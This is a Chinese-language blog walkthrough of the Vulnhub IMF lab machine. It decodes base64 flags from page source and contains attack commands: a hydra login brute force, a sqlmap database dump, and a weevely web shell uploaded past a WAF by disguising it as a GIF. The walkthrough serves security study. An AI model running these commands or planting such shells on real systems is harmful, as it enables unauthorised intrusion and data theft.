IMF-白鸢的笔记

实验环境

攻击者 Kali 192.168.192.128

受害者 IMF IP未知

攻击者和受害者在同一网段

1. 信息收集

nmap -sn 192.168.192.0/24

受害者IP为 192.168.192.170

收集受害者服务详情

nmap -sV -A 192.168.192.170

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

进行FUZZ测试

export URL="http://192.168.192.170/FUZZ" 

#模糊测试目录 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

#模糊测试文件 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

没用

nikto扫描

nikto -host=http://192.168.192.170

没用

2. 漏洞发现和利用

总的来说第一个flag就很不容易发现如果第一个flag无法发现就没办法往下了

view-source:http://192.168.192.170/contact.php

屏幕截图 2024-02-23 224910

第一个flag是这几个乱码拼接并且解码得到的

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

屏幕截图 2024-02-23 225147

再次解码

imfadministrator

图片[3]-IMF-白鸢的笔记

这看起来像是url的一部分

屏幕截图 2024-02-23 225331

源代码中还有一行

<!– I couldn’t get the SQL working, so I hard-coded the password. It’s still mad secure through. – Roger –>

屏幕截图 2024-02-23 225421

用户名出错是这个报错

我们可以使用hydra爆破

屏幕截图 2024-02-23 231204

变量是user和pass POST形式

hydra -V -L /usr/share/seclists/Usernames/Names/names.txt -p 123 192.168.192.170 http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:F=Invalid username."

用户名是rmichaels

或者在http://192.168.192.170/contact.php下有三个用户第一个就是

输入用户名

屏幕截图 2024-02-23 231451

尝试SQL注入密码用来注入失败

看到这个方法

屏幕截图 2024-02-23 221129

尝试一下

屏幕截图 2024-02-23 231714

成功

屏幕截图 2024-02-23 231747

解码

flag3{continueTOcms}

屏幕截图 2024-02-23 232458

点了三个页面都没有什么有用的信息

尝试FUZZ测试

export URL="http://192.168.192.170/imfadministrator/FUZZ"

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

图片[12]-IMF-白鸢的笔记

有个uploads目录暂时不知道有什么用

尝试使用sqlmap爆破

拷贝burp请求报文写入sqli文件

屏幕截图 2024-02-23 233034

开始爆破

sqlmap -r sqli --risk=3 --level=5 --dbs --dump --batch --threads=10

屏幕截图 2024-02-23 233334

发现了一个没见过的目录

http://192.168.192.170/imfadministrator/images/whiteboard.jpg

图片[15]-IMF-白鸢的笔记

好像要解码二维码

https://zxing.org/w/decode.jspx

上传图片

屏幕截图 2024-02-23 233653

flag4{dXBsb2Fkcjk0Mi5waHA=}

解码

uploadr942.php

ok又得到了一个php页面

图片[17]-IMF-白鸢的笔记

看起来是文件上传漏洞

直接上传php文件

屏幕截图 2024-02-23 233940

文件内容不支持

把reverse.php改名为reverse.gif

拦截上传

在文件头加入GIF89a

图片[19]-IMF-白鸢的笔记

被WAF发现了我去

图片[20]-IMF-白鸢的笔记

使用另一个工具来创建reverse

weevely工具

weevely generate 密码生成文件

weevely generate 123456 reverse.php

同上操作上传

图片[21]-IMF-白鸢的笔记

成功上传

图片[22]-IMF-白鸢的笔记

猜测划线部分就是重命名后的文件名但我们暂时不知道上传到哪个目录去了

想到上面FUZZ测试时找到了uploads目录应该就在那

拼接起来就是

http://192.168.192.170/imfadministrator/uploads/36771d545973.jpg

连接木马

weevely 目标密码

weevely http://192.168.192.170/imfadministrator/uploads/36771d545973.jpg 123456

图片[23]-IMF-白鸢的笔记

成功连接到

3. 后渗透阶段

文章版权归作者所有，未经允许请勿转载。

THE END

Vulnhub